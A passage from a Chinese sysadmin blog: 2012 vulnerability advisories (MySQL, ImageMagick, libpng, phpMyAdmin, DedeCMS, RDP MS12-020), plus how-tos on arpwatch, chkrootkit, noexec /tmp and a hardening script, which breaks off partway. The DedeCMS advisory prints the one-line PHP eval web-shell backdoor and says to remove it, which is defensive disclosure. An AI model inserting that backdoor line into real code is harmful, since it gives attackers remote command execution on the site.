Skip to content

Oracle MySQL Server两个不明细节本地漏洞

发布时间: 2012-04-09 漏洞版本: Oracle MySQL 5.x 漏洞描述: MySQL是一个小型关系型数据库管理系统,开发者为瑞典MySQLAB公司,在2008年1月16号被Sun公司收购。

Oracle MySQL在实现上存在两个安全漏洞,可被本地利用造成一定的影响。 < 参考 http://dev.mysql.com/doc/refman/5.5/en/news-5-5-22.html > 安全建议: 厂商补丁:

Oracle

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.oracle.com/technetwork/topics/security/

Posted in Mysql, 安全通告.

Tagged with , .

rev="post-1395" No comments

By C1G 2012/04/12

ImageMagick拒绝服务漏洞

发布时间: 2012-04-09 更新时间: 2012-04-09 危害等级: 中危
漏洞类型:
威胁类型: 远程 CVE编号: CVE-2012-0259

ImageMagick是一款Unix/Linux平台下开源的图像查看和编辑工具。 ImageMagick中存在拒绝服务漏洞,该漏洞源于在解析一个组件计数(components count)为0的JPEG EXIF 标签时“GetEXIFProperty()”函数(magick/property.c)中的一个错误。攻击者可利用该漏洞借助特制的JPEG图片,访问未初始化的或无效的内存。

目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接: http://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=20629 http://www.cert.fi/en/reports/2012/vulnerability635606.html

来源:www.imagemagick.org 链接:http://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=20629

来源:www.cert.fi 链接:http://www.cert.fi/en/reports/2012/vulnerability635606.html

来源:seclists.org 链接:http://seclists.org/oss-sec/2012/q2/19

来源:SECUNIA 名称:48679 链接:http://secunia.com/advisories/48679

Posted in Imagemagick, 安全通告.

Tagged with , .

rev="post-1393" No comments

By C1G 2012/04/12

libpng ‘png_set_text_2()’ 内存破坏漏洞

发布时间: 2012-04-01 更新时间: 2012-04-01 危害等级: 高危
漏洞类型:
威胁类型: 远程 CVE编号: CVE-2011-3048

libpng是多种应用程序所使用的解析PNG图形格式的函数库。 Libpng中存在漏洞,此漏洞源于在解析某些文本块时”png_set_text_2()”函数中的错误。攻击者可利用该漏洞借助特制PNG文件损坏栈内存,成功利用该漏洞可能导致执行任意代码。libpng 1.5.10之前版本、1.4.11版本、1.2.49版本和1.0.59版本中存在该漏洞。

目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接: http://www.libpng.org/pub/png/src/libpng-1.5.10-README.txt

来源:www.libpng.org 链接:http://www.libpng.org/pub/png/src/libpng-1.5.10-README.txt

来源:SECUNIA 名称:48587 链接:http://secunia.com/advisories/48587

Posted in 安全通告.

Tagged with , .

rev="post-1390" No comments

By C1G 2012/04/12

phpMyAdmin敏感信息泄露漏洞

phpMyAdmin是一个免费的WWW界面的mysql数据库管理工具。 phpMyAdmin 3.4.10.2之前的3.4.x版本中的show_config_errors.php中存在漏洞。当配置文件不存在时,远程攻击者可借助一个直接请求获取敏感信息(泄露关于丢失文件的安装路径的错误消息)。

Lempelf用的是phpMyAdmin 3.4.10.1 注意要升级了

目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接: http://www.mandriva.com/en/downloads/

来源: github.com 链接:https://github.com/phpmyadmin/phpmyadmin/commit/c51817d3b8cb05ff54dca9373c0667e29b8498d4

来源: www.phpmyadmin.net 链接:http://www.phpmyadmin.net/home_page/security/PMASA-2012-2.php

Posted in 安全通告.

Tagged with , .

rev="post-1385" No comments

By C1G 2012/04/12

织梦(DedeCMS)后门远程代码执行漏洞

DEDECMS是织梦内容管理系统,国内一款基于PHP+MySQL的技术开发的,支持多种服务器平台的PHP网站内容管理系统。

DedeCMS某些版本/include/shopcar.class.php文件中,被添加后门代码,远程未验证的攻击者利用该后门可以执行任意命令。 DedeCMS V5.7 SP1正式版

UTF-8 GBK版本疑似被植入一句话后门 shopcar.class.php被植入一句话@eval(file_get_contents(‘php://input’));

临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

*直接找到站点include目录下shopcar.class.php文件,去掉里面的代码 @eval(file_get_contents(‘php://input’));即可。

http://www.wooyun.org/bugs/wooyun-2010-05416

Posted in 安全通告.

Tagged with , .

rev="post-1383" No comments

By C1G 2012/04/11

Microsoft Windows远程桌面协议3389代码执行漏洞

Microsoft Windows是微软发布的非常流行的操作系统。 Microsoft Windows XP SP2与SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2及R2 SP1,与Windows 7 Gold与SP1版本中的远程桌面协议(RDP)实现中存在漏洞,该漏洞源于没有正确处理内存中的数据包。远程攻击者可通过发送特制RDP数据包触发访问(1)没有正确初始化或者(2)已被删除的对象,执行任意代码。也称‘Remote Desktop Protocol Vulnerability’。 该漏洞已有修复补丁,如果未能及时安装补丁可采取以下临时修复措施: 方法一:禁用终端服务、远程桌面、远程协助和 Windows Small Business Server 2003 远程工作网站功能; 方法二:在企业周边防火墙中屏蔽TCP端口3389; 方法三:在运行 Windows Vista、Windows 7、Windows Server 2008 和 Windows Server 2008 R2 的受支持版本的系统上启用网络级别身份验证。

目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接: http://technet.microsoft.com/zh-cn/security/bulletin/ms12-020

来源: MS 名称: MS12-020 链接:http://technet.microsoft.com/security/bulletin/MS12-020

来源:SECUNIA 名称:48353 链接:http://secunia.com/advisories/48353

Posted in 安全通告.

Tagged with , .

rev="post-1379" No comments

By C1G 2012/04/11

DELL R410远程管理ip引起的arp问题

arpwatch 命令: 跟踪以太网地址和IP地址配对情况,通过E-mail的形式报告当前的变化。arpwatch使用pcap来监听本网卡和ARP数据包 参数

-d 输出调试信息 -N 使报告不能正常进行 -f 监听的ARP记录 -i 指定监听的网卡 -n 指定附加的本地网络 -r 不从网络上监听ARP信息,而是从文件中读取ARP的记录信息 -u 指定用户和用户组 -e 发送邮件给指定用户,非默认的root用户 -s 指定用户名作为返回地址,而不是默认的用户root

【系统报告信息】

ethernet broadcast :主机的MAC地址是广播地址 ip broadcast :主机的IP地址是广播地址 bogon :源IP地址不是本地子网地址 ethernet mismatch :源MAC地址与ARP数据包里面的地址不匹配 reused old ethernet address :MAC 地址发送变化 suppressed DECnet flip flop :禁止“flip flop”报告

本地的内网为192.168.0.0/24 服务器dell r410 系统centos5.x centos6.x

开启arpwatch #arpwatch

#tail -f /var/log/messages

Apr 1 11:58:06 c1g arpwatch: bogon 192.168.0.120 0:62:b9:5c:a4:41 Apr 1 11:58:11 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3d:37:62 Apr 1 11:58:23 c1g arpwatch: bogon 192.168.0.283 83:22:d6:a1:ad:31 Apr 1 11:58:29 c1g arpwatch: new station 220.188.155.1 0:23:e2:e1:ff:82 Apr 1 11:58:29 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:49:bc:79 Apr 1 11:58:31 c1g arpwatch: bogon 192.168.0.120 c4:ca:d9:b6:4f:8 Apr 1 11:58:33 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3:ef:30 Apr 1 11:58:37 c1g arpwatch: bogon 192.168.0.120 0:62:b9:5c:a4:41 Apr 1 11:58:41 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3d:37:62 Apr 1 11:58:59 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:49:bc:79 Apr 1 11:59:04 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3:ef:30 Apr 1 11:59:07 c1g arpwatch: bogon 192.168.0.120 0:62:b9:5c:a4:41 Apr 1 11:59:11 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3d:37:62

bogon 表示源IP地址不是本地子网地址 多台机器日志中都可以查到多个mac地址占用192.168.0.120 192.168.0.120这个ip我并没有配过 很奇怪的是mac就固定的这几个,不像是arp攻击

Apr 1 11:58:31 c1g arpwatch: bogon 192.168.0.120 c4:ca:d9:b6:4f:8 Apr 1 11:58:59 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:49:bc:79 Apr 1 11:59:04 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3:ef:30 Apr 1 11:59:07 c1g arpwatch: bogon 192.168.0.120 0:62:b9:5c:a4:41 Apr 1 11:59:11 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3d:37:62

仔细对比的日志中的mac地址和现用的eth1相差一位; 联想到手上的一台r410启动时好像出现过192.168.0.120这个ip; 查了下资料dell的远程管理ip地址默认为192.168.0.120; 立马测试了下,在启动到SAS后,按ctrl+c进入IP管理disabled此项 再启动后就少了这个mac地址,证明有效

Posted in IDC, Linux 命令, 安全.

Tagged with , , , .

rev="post-1373" 1 comment

By C1G 2012/04/10

入侵监测软件chkrootkit 安装

rootkit是入侵者经常使用的工具,这类工具可以隐秘、令用户不易察觉的建立了一条能够总能够入侵系统或者说对系统进行实时控制的途径.chkrootkit是可以查找系统是否被安装rootkit的工具,当然无法100%的查出,在系统被安装之后,或者说服务器开放之前就把它装好吧. http://www.chkrootkit.org官方网站 目前最新版为chkrootkit-0.49 官方可能无法正常下载,可以用我博客里的地址https://blog.c1gstudio.com/lempelf/chkrootkit-0.49.tar.gz 测试系统为centos5.8

一.安装

wget https://blog.c1gstudio.com/lempelf/chkrootkit-0.49.tar.gz tar zxvf chkrootkit.tar.gz cd chkrootkit make sense cd .. mv -f chkrootkit- /usr/local/chkrootkit chown -R root:root /usr/local/chkrootkit chmod -R 700 /usr/local/chkrootkit

二.运行

有些命令是当前目录下运行需cd到chkrootkit目录 cd /usr/local/chkrootkit ./chkrootkit

ROOTDIR is `/’ Checking `amd’… not found Checking `basename’… not infected Checking `biff’… not found Checking `chfn’… not infected Checking `chsh’… not infected Checking `cron’… not infected Checking `crontab’… not infected Checking `date’… not infected Checking `du’… not infected Checking `dirname’… not infected Checking `echo’… not infected Checking `egrep’… not infected Checking `env’… not infected Checking `find’… not infected Checking `fingerd’… not found Checking `gpm’… not infected Checking `grep’… not infected Checking `hdparm’… not infected Checking `su’… not infected Checking `ifconfig’… not infected Checking `inetd’… not tested Checking `inetdconf’… not found Checking `identd’… not found Checking `init’… not infected Checking `killall’… not infected Checking `ldsopreload’… not infected Checking `login’… not infected Checking `ls’… not infected Checking `lsof’… not infected Checking `mail’… not infected Checking `mingetty’… not infected Checking `netstat’… not infected Checking `named’… not found Checking `passwd’… not infected Checking `pidof’… not infected Checking `pop2’… not found Checking `pop3’… not found Checking `ps’… not infected Checking `pstree’… not infected Checking `rpcinfo’… not infected Checking `rlogind’… not found Checking `rshd’… not found Checking `slogin’… not infected Checking `sendmail’… not infected Checking `sshd’… not infected Checking `syslogd’… not infected Checking `tar’… not infected Checking `tcpd’… not infected Checking `tcpdump’… not infected Checking `top’… not infected Checking `telnetd’… not infected Checking `timed’… not found Checking `traceroute’… not infected Checking `vdir’… not infected Checking `w’… not infected Checking `write’… not infected Checking `aliens’… no suspect files Searching for sniffer’s logs, it may take a while… nothing found Searching for HiDrootkit’s default dir… nothing found Searching for t0rn’s default files and dirs… nothing found Searching for t0rn’s v8 defaults… nothing found Searching for Lion Worm default files and dirs… nothing found Searching for RSHA’s default files and dir… nothing found Searching for RH-Sharpe’s default files… nothing found Searching for Ambient’s rootkit (ark) default files and dirs… nothing found Searching for suspicious files and dirs, it may take a while… /usr/lib/python2.4/config/.relocation-tag /usr/lib/gtk-2.0/immodules/.relocation-tag /usr/lib/.libgcrypt.so.11.hmac /lib/.libssl.so.0.9.8e.hmac /lib/.libcrypto.so.0.9.8e.hmac /lib/.libssl.so.6.hmac /lib/.libcrypto.so.6.hmac Searching for LPD Worm files and dirs… nothing found Searching for Ramen Worm files and dirs… nothing found Searching for Maniac files and dirs… nothing found Searching for RK17 files and dirs… nothing found Searching for Ducoci rootkit… nothing found Searching for Adore Worm… nothing found Searching for ShitC Worm… nothing found Searching for Omega Worm… nothing found Searching for Sadmind/IIS Worm… nothing found Searching for MonKit… nothing found Searching for Showtee… nothing found Searching for OpticKit… nothing found Searching for T.R.K… nothing found Searching for Mithra… nothing found Searching for LOC rootkit… nothing found Searching for Romanian rootkit… nothing found Searching for HKRK rootkit… nothing found Searching for Suckit rootkit… nothing found Searching for Volc rootkit… nothing found Searching for Gold2 rootkit… nothing found Searching for TC2 Worm default files and dirs… nothing found Searching for Anonoying rootkit default files and dirs… nothing found Searching for ZK rootkit default files and dirs… nothing found Searching for ShKit rootkit default files and dirs… nothing found Searching for AjaKit rootkit default files and dirs… nothing found Searching for zaRwT rootkit default files and dirs… nothing found Searching for Madalin rootkit default files… nothing found Searching for Fu rootkit default files… nothing found Searching for ESRK rootkit default files… nothing found Searching for rootedoor… nothing found Searching for ENYELKM rootkit default files… nothing found Searching for common ssh-scanners default files… nothing found Searching for suspect PHP files… /tmp/pear/download/Archive_Tar-1.3.9/Archive/Tar.php /tmp/pear/download/XML_Util-1.2.1/tests/AllTests.php /tmp/pear/download/XML_Util-1.2.1/Util.php /tmp/pear/download/XML_Util-1.2.1/examples/example2.php /tmp/pear/download/XML_Util-1.2.1/examples/example.php /tmp/pear/download/Archive_Tar-1.3.7/Archive/Tar.php /tmp/pear/download/Structures_Graph-1.0.4/tests/testCase/BasicGraph.php /tmp/pear/download/Structures_Graph-1.0.4/tests/AllTests.php /tmp/pear/download/Structures_Graph-1.0.4/Structures/Graph.php /tmp/pear/download/Structures_Graph-1.0.4/Structures/Graph/Node.php /tmp/pear/download/Structures_Graph-1.0.4/Structures/Graph/Manipulator/AcyclicTest.php /tmp/pear/download/Structures_Graph-1.0.4/Structures/Graph/Manipulator/TopologicalSorter.php /tmp/pear/download/PEAR-1.9.1/PEAR5.php /tmp/pear/download/PEAR-1.9.1/PEAR/REST/10.php /tmp/pear/download/PEAR-1.9.1/PEAR/REST/13.php /tmp/pear/download/PEAR-1.9.1/PEAR/REST/11.php /tmp/pear/download/PEAR-1.9.1/PEAR/Builder.php /tmp/pear/download/PEAR-1.9.1/PEAR/Downloader/Package.php /tmp/pear/download/PEAR-1.9.1/PEAR/FixPHP5PEARWarnings.php /tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Data.php /tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Doc.php /tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Php.php /tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Cfg.php /tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Src.php /tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Www.php /tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Test.php /tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Common.php /tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Script.php /tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Ext.php /tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role.php /tmp/pear/download/PEAR-1.9.1/PEAR/Packager.php /tmp/pear/download/PEAR-1.9.1/PEAR/Validator/PECL.php /tmp/pear/download/PEAR-1.9.1/PEAR/Installer.php /tmp/pear/download/PEAR-1.9.1/PEAR/Config.php /tmp/pear/download/PEAR-1.9.1/PEAR/Registry.php /tmp/pear/download/PEAR-1.9.1/PEAR/Command/Install.php /tmp/pear/download/PEAR-1.9.1/PEAR/Command/Mirror.php /tmp/pear/download/PEAR-1.9.1/PEAR/Command/Remote.php /tmp/pear/download/PEAR-1.9.1/PEAR/Command/Build.php /tmp/pear/download/PEAR-1.9.1/PEAR/Command/Config.php /tmp/pear/download/PEAR-1.9.1/PEAR/Command/Registry.php /tmp/pear/download/PEAR-1.9.1/PEAR/Command/Pickle.php /tmp/pear/download/PEAR-1.9.1/PEAR/Command/Channels.php /tmp/pear/download/PEAR-1.9.1/PEAR/Command/Auth.php /tmp/pear/download/PEAR-1.9.1/PEAR/Command/Test.php /tmp/pear/download/PEAR-1.9.1/PEAR/Command/Common.php /tmp/pear/download/PEAR-1.9.1/PEAR/Command/Package.php /tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile.php /tmp/pear/download/PEAR-1.9.1/PEAR/RunTest.php /tmp/pear/download/PEAR-1.9.1/PEAR/Autoloader.php /tmp/pear/download/PEAR-1.9.1/PEAR/Frontend.php /tmp/pear/download/PEAR-1.9.1/PEAR/Validate.php /tmp/pear/download/PEAR-1.9.1/PEAR/ErrorStack.php /tmp/pear/download/PEAR-1.9.1/PEAR/Task/Replace/rw.php /tmp/pear/download/PEAR-1.9.1/PEAR/Task/Unixeol/rw.php /tmp/pear/download/PEAR-1.9.1/PEAR/Task/Postinstallscript.php /tmp/pear/download/PEAR-1.9.1/PEAR/Task/Windowseol/rw.php /tmp/pear/download/PEAR-1.9.1/PEAR/Task/Replace.php /tmp/pear/download/PEAR-1.9.1/PEAR/Task/Unixeol.php /tmp/pear/download/PEAR-1.9.1/PEAR/Task/Windowseol.php /tmp/pear/download/PEAR-1.9.1/PEAR/Task/Common.php /tmp/pear/download/PEAR-1.9.1/PEAR/Task/Postinstallscript/rw.php /tmp/pear/download/PEAR-1.9.1/PEAR/ChannelFile/Parser.php /tmp/pear/download/PEAR-1.9.1/PEAR/Common.php /tmp/pear/download/PEAR-1.9.1/PEAR/XMLParser.php /tmp/pear/download/PEAR-1.9.1/PEAR/Downloader.php /tmp/pear/download/PEAR-1.9.1/PEAR/DependencyDB.php /tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile/v2.php /tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile/v2/rw.php /tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile/v2/Validator.php /tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile/Generator/v2.php /tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile/Generator/v1.php /tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile/v1.php /tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile/Parser/v2.php /tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile/Parser/v1.php /tmp/pear/download/PEAR-1.9.1/PEAR/REST.php /tmp/pear/download/PEAR-1.9.1/PEAR/Command.php /tmp/pear/download/PEAR-1.9.1/PEAR/Dependency2.php /tmp/pear/download/PEAR-1.9.1/PEAR/Exception.php /tmp/pear/download/PEAR-1.9.1/PEAR/Frontend/CLI.php /tmp/pear/download/PEAR-1.9.1/PEAR/ChannelFile.php /tmp/pear/download/PEAR-1.9.1/scripts/peclcmd.php /tmp/pear/download/PEAR-1.9.1/scripts/pearcmd.php /tmp/pear/download/PEAR-1.9.1/System.php /tmp/pear/download/PEAR-1.9.1/PEAR.php /tmp/pear/download/PEAR-1.9.1/OS/Guess.php /tmp/pear/download/Console_Getopt-1.2.3/Console/Getopt.php /tmp/pear/download/PEAR-1.9.4/PEAR5.php /tmp/pear/download/PEAR-1.9.4/PEAR/REST/10.php /tmp/pear/download/PEAR-1.9.4/PEAR/REST/13.php /tmp/pear/download/PEAR-1.9.4/PEAR/REST/11.php /tmp/pear/download/PEAR-1.9.4/PEAR/Builder.php /tmp/pear/download/PEAR-1.9.4/PEAR/Downloader/Package.php /tmp/pear/download/PEAR-1.9.4/PEAR/FixPHP5PEARWarnings.php /tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Data.php /tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Doc.php /tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Php.php /tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Cfg.php /tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Src.php /tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Www.php /tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Test.php /tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Common.php /tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Script.php /tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Ext.php /tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role.php /tmp/pear/download/PEAR-1.9.4/PEAR/Packager.php /tmp/pear/download/PEAR-1.9.4/PEAR/Validator/PECL.php /tmp/pear/download/PEAR-1.9.4/PEAR/Installer.php /tmp/pear/download/PEAR-1.9.4/PEAR/Config.php /tmp/pear/download/PEAR-1.9.4/PEAR/Registry.php /tmp/pear/download/PEAR-1.9.4/PEAR/Command/Install.php /tmp/pear/download/PEAR-1.9.4/PEAR/Command/Mirror.php /tmp/pear/download/PEAR-1.9.4/PEAR/Command/Remote.php /tmp/pear/download/PEAR-1.9.4/PEAR/Command/Build.php /tmp/pear/download/PEAR-1.9.4/PEAR/Command/Config.php /tmp/pear/download/PEAR-1.9.4/PEAR/Command/Registry.php /tmp/pear/download/PEAR-1.9.4/PEAR/Command/Pickle.php /tmp/pear/download/PEAR-1.9.4/PEAR/Command/Channels.php /tmp/pear/download/PEAR-1.9.4/PEAR/Command/Auth.php /tmp/pear/download/PEAR-1.9.4/PEAR/Command/Test.php /tmp/pear/download/PEAR-1.9.4/PEAR/Command/Common.php /tmp/pear/download/PEAR-1.9.4/PEAR/Command/Package.php /tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile.php /tmp/pear/download/PEAR-1.9.4/PEAR/RunTest.php /tmp/pear/download/PEAR-1.9.4/PEAR/Autoloader.php /tmp/pear/download/PEAR-1.9.4/PEAR/Frontend.php /tmp/pear/download/PEAR-1.9.4/PEAR/Validate.php /tmp/pear/download/PEAR-1.9.4/PEAR/ErrorStack.php /tmp/pear/download/PEAR-1.9.4/PEAR/Task/Replace/rw.php /tmp/pear/download/PEAR-1.9.4/PEAR/Task/Unixeol/rw.php /tmp/pear/download/PEAR-1.9.4/PEAR/Task/Postinstallscript.php /tmp/pear/download/PEAR-1.9.4/PEAR/Task/Windowseol/rw.php /tmp/pear/download/PEAR-1.9.4/PEAR/Task/Replace.php /tmp/pear/download/PEAR-1.9.4/PEAR/Task/Unixeol.php /tmp/pear/download/PEAR-1.9.4/PEAR/Task/Windowseol.php /tmp/pear/download/PEAR-1.9.4/PEAR/Task/Common.php /tmp/pear/download/PEAR-1.9.4/PEAR/Task/Postinstallscript/rw.php /tmp/pear/download/PEAR-1.9.4/PEAR/ChannelFile/Parser.php /tmp/pear/download/PEAR-1.9.4/PEAR/Common.php /tmp/pear/download/PEAR-1.9.4/PEAR/XMLParser.php /tmp/pear/download/PEAR-1.9.4/PEAR/Downloader.php /tmp/pear/download/PEAR-1.9.4/PEAR/DependencyDB.php /tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile/v2.php /tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile/v2/rw.php /tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile/v2/Validator.php /tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile/Generator/v2.php /tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile/Generator/v1.php /tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile/v1.php /tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile/Parser/v2.php /tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile/Parser/v1.php /tmp/pear/download/PEAR-1.9.4/PEAR/REST.php /tmp/pear/download/PEAR-1.9.4/PEAR/Command.php /tmp/pear/download/PEAR-1.9.4/PEAR/Dependency2.php /tmp/pear/download/PEAR-1.9.4/PEAR/Exception.php /tmp/pear/download/PEAR-1.9.4/PEAR/Frontend/CLI.php /tmp/pear/download/PEAR-1.9.4/PEAR/ChannelFile.php /tmp/pear/download/PEAR-1.9.4/scripts/peclcmd.php /tmp/pear/download/PEAR-1.9.4/scripts/pearcmd.php /tmp/pear/download/PEAR-1.9.4/System.php /tmp/pear/download/PEAR-1.9.4/PEAR.php /tmp/pear/download/PEAR-1.9.4/OS/Guess.php /tmp/pear/download/Console_Getopt-1.3.1/Console/Getopt.php /tmp/pear/download/Structures_Graph-1.0.3/tests/testCase/BasicGraph.php /tmp/pear/download/Structures_Graph-1.0.3/tests/AllTests.php /tmp/pear/download/Structures_Graph-1.0.3/Structures/Graph.php /tmp/pear/download/Structures_Graph-1.0.3/Structures/Graph/Node.php /tmp/pear/download/Structures_Graph-1.0.3/Structures/Graph/Manipulator/AcyclicTest.php /tmp/pear/download/Structures_Graph-1.0.3/Structures/Graph/Manipulator/TopologicalSorter.php Searching for anomalies in shell history files… Warning: `//root/.mysql_history’ is linked to another file Checking `asp’… not infected Checking `bindshell’… not infected Checking `lkm’… chkproc: nothing detected chkdirs: nothing detected Checking `rexedcs’… not found Checking `sniffer’… eth0: not promisc and no PF_PACKET sockets Checking `w55808’… not infected Checking `wted’… chkwtmp: nothing deleted Checking `scalper’… not infected Checking `slapper’… not infected Checking `z2’… chklastlog: nothing deleted Checking `chkutmp’… chkutmp: nothing deleted Checking `OSX_RSPLUG’… not infected

以上文件没有问题,出现INFECTED那就要小心了 ./chkrootkit | grep INFECTED

三.自动运行

创建每日运行脚本,发现问题后自动发送邮件 vi chkrootkitcron.sh

#!/bin/bash TOOLKITSPATH=/usr/local MAILUSER=root@localhost file_chkrootkit_log=chkrootkitcron.log servername=`hostname` date=`date +%Y-%m-%d` cd ${TOOLKITSPATH}/chkrootkit ./chkrootkit > ${file_chkrootkit_log} [ ! -z “$(grep INFECTED ${file_chkrootkit_log})” ] && \ grep INFECTED ${file_chkrootkit_log} | mail -s “[chkrootkit] report in ${servername} ${date}” ${MAILUSER}

放入crontab中

echo “40 5 * * * cd /opt/shell && /bin/sh ./chkrootkitcron.sh > /dev/null 2>&1” >> /var/spool/cron/root

Posted in 安全.

Tagged with , .

rev="post-1365" No comments

By C1G 2012/04/09

限制/tmp分区的执行权限

Linux的提权rootkit基本都是已编译的执行文件。禁止其在/tmp下的运行可降低黑客入侵的可能性。 Perl、PHP脚本属于解释型语言,可通过perl/php命令直接调用,即使脚本存放于/tmp也不受限制。

先以有独立/tmp分区的为例

1.mount 查看一下/tmp为default

/dev/mapper/VolGroup00-LogVol01 on / type ext3 (rw) proc on /proc type proc (rw) sysfs on /sys type sysfs (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) /dev/mapper/VolGroup01-LogVol00 on /opt type ext3 (rw) /dev/mapper/VolGroup00-LogVol03 on /var type ext3 (rw) /dev/mapper/VolGroup00-LogVol02 on /tmp type ext3 (rw) /dev/sda1 on /boot type ext3 (rw) tmpfs on /dev/shm type tmpfs (rw) none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

2.给/tmp加上(nosuid,noexec) vi /etc/fstab

/dev/VolGroup00/LogVol01 / ext3 defaults 1 1 /dev/VolGroup01/LogVol00 /opt ext3 defaults 1 2 /dev/VolGroup00/LogVol03 /var ext3 defaults 1 2 /dev/VolGroup00/LogVol02 /tmp ext3 defaults,nosuid,noexec 1 2 LABEL=/boot /boot ext3 defaults 1 2 tmpfs /dev/shm tmpfs defaults 0 0 devpts /dev/pts devpts gid=5,mode=620 0 0 sysfs /sys sysfs defaults 0 0 proc /proc proc defaults 0 0 /dev/VolGroup00/LogVol00 swap swap defaults 0 0

3.依据fstab重新载入/tmp mount -oremount /tmp

4.再次查看 mount

/dev/mapper/VolGroup00-LogVol01 on / type ext3 (rw) proc on /proc type proc (rw) sysfs on /sys type sysfs (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) /dev/mapper/VolGroup01-LogVol00 on /opt type ext3 (rw) /dev/mapper/VolGroup00-LogVol03 on /var type ext3 (rw) /dev/mapper/VolGroup00-LogVol02 on /tmp type ext3 (rw,noexec,nosuid) /dev/sda1 on /boot type ext3 (rw) tmpfs on /dev/shm type tmpfs (rw) none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

5.执行文件测试 vi test.sh

#!/bin/bash echo ‘/tmp test’

chmod u+x ./test.sh ./test.sh -bash: ./test.sh: /bin/bash: bad interpreter: Permission denied

6.迁移/var/tmp目录

mv /var/tmp/* /tmp/ rm -fr /var/tmp ln -s /tmp /var/tmp

对不存在独立/tmp分区的可以用dd创建个10G大小文件作/tmp

cd /usr/ dd if=/dev/zero of=Tmp bs=1024 count=10000000 mkfs -t ext3 /usr/Tmp mkdir /tmp_backup cp -ar /tmp /tmp_backup mount -o loop,rw,noexec,nosuid /usr/Tmp /tmp cp -ar /tmp_backup/tmp/* /tmp/ chmod 0777 /tmp chmod +t /tmp rm -rf /tmp_backup #放入fstab 中启动加载 echo “/usr/Tmp /tmp ext3 loop,rw,noexec,nosuid 0 0” >> /etc/fstab

Posted in 安全.

Tagged with , .

rev="post-1360" No comments

By C1G 2012/04/06

linux基本安全配置设置脚本1.2发布

依据linux基本安全配置手册 方便设置一些基本的linux安全设置

更新============= 兼容centos/rhel 6 tty,ctrlaltdel,ipv6 关闭服务可以使用白名单,更可靠 限制su的用户组修正兼容性(充许su的用户需用gpasswd命令添加,sudoer不受限制)

#vi autosafe.sh

#!/bin/bash ######################################################################### # # File: autosafe.sh # Description: # Language: GNU Bourne-Again SHell # Version: 1.2 # Date: 2012-3-30 # Corp.: c1gstudio # Author: c1g # WWW: https://blog.c1gstudio.com ### END INIT INFO ############################################################################### if [[ ! -n ${WORKUSER} ]]; then WORKUSER=c1g fi if [[ ! -n ${SSHPORT} ]]; then SSHPORT=22 fi V_DELUSER=”adm lp sync shutdown halt mail news uucp operator games gopher ftp” V_DELGROUP=”adm lp mail news uucp games gopher mailnull floppy dip pppusers popusers slipusers daemon” V_PASSMINLEN=8 V_HISTSIZE=30 V_TMOUT=300 V_GROUPNAME=suadmin #V_SERVICE Not working since Version 1.2 V_SERVICE=”acpid anacron apmd atd auditd autofs avahi-daemon avahi-dnsconfd bluetooth cpuspeed cups dhcpd firstboot gpm haldaemon hidd ip6tables ipsec isdn kudzu lpd mcstrans messagebus microcode_ctl netfs nfs nfslock nscd pcscd portmap readahead_early restorecond rpcgssd rpcidmapd rstatd sendmail setroubleshoot snmpd xfs xinetd 